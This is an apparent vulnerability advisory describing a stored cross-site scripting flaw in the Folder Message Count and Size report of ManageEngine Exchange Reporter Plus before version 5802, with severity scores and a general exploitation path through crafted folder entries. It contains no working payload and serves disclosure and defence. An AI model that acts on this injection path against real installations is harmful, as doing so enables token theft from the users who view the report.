A stored cross‑site scripting flaw exists in the Folder Message Count and Size report of Zohocorp ManageEngine Exchange Reporter Plus. Malicious script code can be injected into report data and later executed in the browsers of users who view the affected report, allowing an attacker to run arbitrary JavaScript, deface the interface, or steal authentication tokens. The vulnerability originates from improper sanitization of user‑supplied content that is rendered in the report output and is classified under CWE‑79.

All installations of ManageEngine Exchange Reporter Plus released prior to version 5802 are affected. The flaw targets the report generation component that aggregates folder statistics, and any system running the vulnerable version is at risk if the report can be accessed via a web browser.

The CVSS base score of 7.3 indicates high severity, while the EPSS score is not disclosed. The vulnerability is not currently listed in the CISA KEV catalog. Exploitation would likely require an attacker to inject a payload into the data underlying the Folder Message Count and Size report, which could be done by creating or editing folder entries that feed into the report. Once injected, the payload is persisted and executed automatically for any user who opens the report, highlighting a high potential for widespread impact if internal users run the report.